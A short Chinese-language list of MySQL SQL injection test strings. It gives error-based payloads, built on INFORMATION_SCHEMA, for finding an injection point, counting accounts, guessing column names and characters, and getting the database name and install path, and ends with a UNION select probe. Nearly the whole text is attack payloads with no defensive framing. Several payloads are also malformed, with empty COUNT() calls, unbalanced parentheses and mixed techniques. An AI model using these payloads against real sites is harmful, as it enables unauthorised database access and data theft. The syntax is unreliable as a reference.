常用 SQL 注入测试语句(MySQL 语法):

判断注入点:-1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x7e,(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN SLEEP(5) ELSE 0 END)) FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY CHARSET))a)) AND (-1)--+

猜帐号数目:-1 AND (SELECT COUNT(),CONCAT(0x7e,(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN COUNT() ELSE 0 END)) FROM INFORMATION_SCHEMA.USERS GROUP BY USER))a)) AND (-1)--+

猜解字段名称:-1 AND (SELECT COUNT(*),CONCAT(0x7e,(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN COLUMN_NAME ELSE 0 END)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x74657374))a)) AND (-1)--+

猜解字符:-1 AND (SELECT COUNT(*),CONCAT(0x7e,(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN SUBSTRING(0x74657374,1,1) ELSE 0 END)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x74657374))a)) AND (-1)--+

得到库名:-1 AND (SELECT COUNT(*),CONCAT(0x7e,(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN DATABASE() ELSE 0 END)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x74657374))a)) AND (-1)--+

得到WEB路径(注:@@basedir 返回的是 MySQL 安装目录,并非 WEB 根目录):-1 AND (SELECT COUNT(*),CONCAT(0x7e,(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN 1 ELSE 0 END)),(SELECT (CASE WHEN (666=666) THEN @@basedir ELSE 0 END)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x74657374))a)) AND (-1)--+

联合查询(UNION)构造:0' union select 1,2,3,4--+